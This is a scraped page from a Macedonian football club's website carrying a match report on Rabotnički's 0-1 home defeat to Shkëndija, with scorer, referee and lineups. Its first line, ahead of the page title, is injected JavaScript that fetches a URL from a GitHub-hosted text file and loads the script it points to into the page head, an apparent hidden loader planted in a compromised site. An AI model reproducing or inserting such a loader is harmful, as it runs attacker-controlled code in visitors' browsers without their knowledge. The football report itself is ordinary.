;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Пораз од Шкендија (0-1) во Скопје
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Пораз од Шкендија (0-1) во Скопје

Работнички го загуби четвртиот последовен првенствен натпревар откако доживеа минимален пораз (0-1) од Шкендија во 32.коло од Првата фудбалска лига. Енур Тотре беше стрелец на победничкиот гол за гостите во 90.минута од натпреварот.

Тој доби топка во празно, влезе во шеснаесетникот и со одмерен удар ја затресе мрежата на Ристо Јанков. Со овој триумф Шкендија ја потврди шампионската титула, а Работнички со 39 бода останува на шестата позиција на табелата.

Баже Илијоски во втората минута падна во противничкиот шеснаесетник, но судијата Марјан Гоцевски не покажа на белата точка. Потоа се обиде Херера со удар со глава, но Реџепи одбрани. Алими и Пеев шутираа крај голот, а најубавата шанса во првиот дел ја имаше Петар Петковски. Тој во 35.минута шутираше од 12 метри, но Реџепи повторно одбрани.

Во вториот дел немаше големи можности за Шкендија. Работнички беше многу блиску до гол, Шаркоски ја погоди стативата, Блажевски шутираше во гредата, но во завршницата сепак триумфираше Шкендија. Енур Тотре во 90.минута ја искористи одличната асистенција и го совлада Јанков за триумф. Манојан, а потоа и Фазлиу имаа можности на спротивната страна, но, сепак, Работнички доживеа пораз.

РАБОТНИЧКИ – ШКЕНДИЈА 0-1 (0-0)

Арена „Тоше Проески“ во Скопје. Судија: Марјан Гоцевски (Струмица). Стрелец: Енур Тотре 90’ (Шкендија). Ж. картони: Илијоски, Манојан (Работнички).

РАБОТНИЧКИ: Јанков, Вијачки, Димитровски, Херера, Петровиќ, Шаркоски, Пеев (26’ Ацковски), Манојан (90’ Фазлиу), Петковски, Блажевски, Илијоски (79’ Гофри).

ШКЕНДИЈА: Реџепи, Мурати, Садриу, Муслиу, Мици (90’ Мерџани), Алими, Тотре, Жуниор, Ибраими, Радески (75’ Нафиу), Имери (64’ Шефити).